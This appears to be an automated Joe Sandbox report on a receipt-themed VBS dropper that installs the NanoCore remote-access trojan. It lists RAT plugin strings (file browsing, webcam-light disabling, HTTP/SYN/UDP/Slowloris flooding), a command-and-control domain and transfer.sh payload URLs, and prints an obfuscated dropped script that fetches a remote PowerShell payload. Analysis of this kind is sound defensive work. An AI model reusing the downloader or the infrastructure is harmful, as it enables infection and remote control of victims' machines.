Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Registry Run Keys / Startup Folder1	Process Injection212	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter11	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting221	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Process Injection212	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting221	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery12	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
newjan.duckdns.org	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://go.microsoft.cop	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
newjan.duckdns.org	194.147.140.20	true	true	10%, Virustotal, Browse	unknown
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.sh/yxvc69/edrftg.txt	false		high
https://transfer.sh/lkuFqc/yhujer.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://go.microsoft.cop	powershell.exe, 00000002.00000002.396657490.00000259CABE3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	false		high
https://transfer.sh	powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	false		high
https://transfer.sh/yxvc69/edrftg.txt(	powershell.exe, 00000002.00000002.397274536.00000259CAE6E000.00000004.00000001.sdmp	false		high
http://google.com	aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	false		high
https://transfer.sh/lkuFqc/yhujer.txt(	powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.396817836.00000259CAC61000.00000004.00000001.sdmp	false		high
http://crl.v	powershell.exe, 00000002.00000002.396527512.00000259CAB50000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
194.147.140.20	newjan.duckdns.org	unknown		47285	PTPEU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483211
Start date:	14.09.2021
Start time:	17:01:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	15 Items Receipt.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@10/10@26/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 13.107.4.50, 20.82.209.104, 80.67.82.235, 80.67.82.211, 20.82.209.183, 20.54.110.249 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:02:12	API Interceptor	34x Sleep call for process: powershell.exe modified
17:03:21	API Interceptor	1457x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	Receipt_12203.vbs	Get hash	malicious	Browse	transfer.sh/get/E2oQCW/Server.txt
	Invoice #60122.vbs	Get hash	malicious	Browse	transfer.sh/get/Vp6k0P/Server.txt
	M00GS82.vbs	Get hash	malicious	Browse	transfer.sh/get/QipjYs/fOOFFK.txt
	#P0082.vbs	Get hash	malicious	Browse	transfer.sh/get/4YgL52/HJN.txt
	Invoice #33190.vbs	Get hash	malicious	Browse	transfer.sh/get/1jDQCmj/trivago.txt
	ZHDJFEB83MK.vbs	Get hash	malicious	Browse	transfer.sh/15cCRXY/KFKFKF.txt
	#W002.vbs	Get hash	malicious	Browse	transfer.sh/1YKpmfw/HmS.txt
	WOO62_InvoiceCopy.vbs	Get hash	malicious	Browse	transfer.sh/p/SHJA.txt
	A719830-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/b/deef.txt
	S0187365-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/1w231Gc/eeff.txt
	X92867354_PAYMENT_RECEIPT.vbs	Get hash	malicious	Browse	transfer.sh/1cKLmWw/defff.txt
	H6289_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/bypass.txt
	W00903InvoicePayment.vbs	Get hash	malicious	Browse	transfer.sh/1Qh4UR2/defender.txt
	R73981_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/1yD4k6Q/ftf.txt
	S83735478_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1WFWzN7/defender.txt
	D37186235_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1RzUlWk/defender.txt
	In_WO072.vbs	Get hash	malicious	Browse	transfer.sh/1RKyZ9I/hjdds.txt
	FDOCX3429067800.vbs	Get hash	malicious	Browse	transfer.sh/1AeAeyx/defender.txt
	W092.vbs	Get hash	malicious	Browse	transfer.sh/1DiufNP/JKS.txt
	Texas Windstorm Insurance upgrade package.vbs	Get hash	malicious	Browse	transfer.sh/get/1R86ggs/defender.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
newjan.duckdns.org	14 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	16 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	41-Items-invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	8 Items invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	3G1J49A6V_Invoice.vbs	Get hash	malicious	Browse	185.244.30.23
	LxYbtlP5nB.exe	Get hash	malicious	Browse	185.244.30.23
	Invoice#282730.exe	Get hash	malicious	Browse	79.134.225.9
	Urban Receipt.exe	Get hash	malicious	Browse	79.134.225.9
	d9hGzIR8mh.exe	Get hash	malicious	Browse	194.5.97.75
	6554353_Payment_Invoice.exe	Get hash	malicious	Browse	194.5.97.75
transfer.sh	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	8 Items invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt_12203.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice #60122.vbs	Get hash	malicious	Browse	144.76.136.153
	83736354Invoicereceipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice52190.vbs	Get hash	malicious	Browse	144.76.136.153
	M00GS82.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#52190.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	8373543_Invoice_Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	A6D8N25S_Invoice_receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#1096.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	#P0082.vbs	Get hash	malicious	Browse	144.76.136.153
	Services Needed.vbs	Get hash	malicious	Browse	144.76.136.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	gyuFYFGuig.vbs	Get hash	malicious	Browse	148.251.87.253
	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	i3UmAT06iE.exe	Get hash	malicious	Browse	195.201.225.248
	cd.exe	Get hash	malicious	Browse	168.119.139.96
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	GCw589FSm7.exe	Get hash	malicious	Browse	195.201.225.248
	jFQ6SEAt26	Get hash	malicious	Browse	49.13.162.183
	67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exe	Get hash	malicious	Browse	195.201.225.248
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
	4J1sKiGm0T.exe	Get hash	malicious	Browse	116.203.165.54
	lB2RFTpyni.exe	Get hash	malicious	Browse	116.203.165.54
	lgT2LzjZ6N.exe	Get hash	malicious	Browse	116.203.165.54
	gmeqUPOV23.exe	Get hash	malicious	Browse	116.203.165.54
	BqgOuMRaJ3.exe	Get hash	malicious	Browse	116.203.165.54
	Invoice.xlsx	Get hash	malicious	Browse	136.243.159.53
PTPEU	14 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	16 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	SPT DRINGENDE BESTELLUNG _876453,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	41-Items-invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	Confirmaci#U00f3n del pedido- No HD10103,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	SPT DRINGENDE BESTELLUNG _8764,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	8 Items invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	heimatec RFQ 4556_ DRINGEND,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	Confirmarea comenzii noi-4019,pdf.exe	Get hash	malicious	Browse	194.147.140.9
	vuaXoDsazg	Get hash	malicious	Browse	194.147.142.145
	dsMBH5SmxL	Get hash	malicious	Browse	194.147.142.145
	YIupXk5F7b	Get hash	malicious	Browse	194.147.142.145
	pvbuEVYCUB	Get hash	malicious	Browse	194.147.142.145
	1jTsJsy5b8	Get hash	malicious	Browse	194.147.142.145
	fpAHzxlGRn	Get hash	malicious	Browse	194.147.142.145
	sV5aR2SUfW.exe	Get hash	malicious	Browse	194.147.142.230
	qSN1mPnL52.exe	Get hash	malicious	Browse	194.147.142.230
	PO20171118-COGRAL SPA.jar	Get hash	malicious	Browse	185.105.236.179
	New Order_R4.jar	Get hash	malicious	Browse	185.105.236.179
	CYzY9Pi2ny.exe	Get hash	malicious	Browse	194.147.142.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	14 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	144.76.136.153
	8aGRdeN1Be.exe	Get hash	malicious	Browse	144.76.136.153
	QLMRTJS9RA.exe	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.W32.AIDetect.malware2.32348.exe	Get hash	malicious	Browse	144.76.136.153
	diagram-477.doc	Get hash	malicious	Browse	144.76.136.153
	Rombat-0118PDF.exe	Get hash	malicious	Browse	144.76.136.153
	CLLKFIJI_(9-13-2021).xlsx.vbs	Get hash	malicious	Browse	144.76.136.153
	YyKMqtQcLMkGx.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210913_074002_566345 pdf.exe	Get hash	malicious	Browse	144.76.136.153
	Kopie dokladu o transakci 09_14_21.exe	Get hash	malicious	Browse	144.76.136.153
	qashmhBw9u.exe	Get hash	malicious	Browse	144.76.136.153
	setup_x86_x64_install.exe	Get hash	malicious	Browse	144.76.136.153
	Quotation.exe	Get hash	malicious	Browse	144.76.136.153
	PROJ-9560 - PACKING SLIP.exe	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Halkbank_Ekstre_20210726_084931-069855PDF.exe	Get hash	malicious	Browse	144.76.136.153
	Synaptics_Software.exe	Get hash	malicious	Browse	144.76.136.153

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Run\New.vbs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3099
Entropy (8bit):	3.6666241707094236
Encrypted:	false
SSDEEP:	96:i4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyD:i4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyB
MD5:	35A01D35B8F3C0558B1725AEF1390F61
SHA1:	CA16768DAB801BF4CCCF1F047B5B4D41B75605E6
SHA-256:	F42602DA7A2739CC77F94364B6A310C8FCEDD85866A20776F4B94AB353215AF7
SHA-512:	3C9A0BF3CF526D234E70230A302A4CEF00FBB9A2800453B2AE15657E7494B92352E2C81FF5DEA9B7561DBA925B0ACC1D32F5E8D0849380BDC07B33E955F1C583
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\Public\Run\New.vbs, Author: Florian Roth
Reputation:	low
Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/lkuFqc/yhujerH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
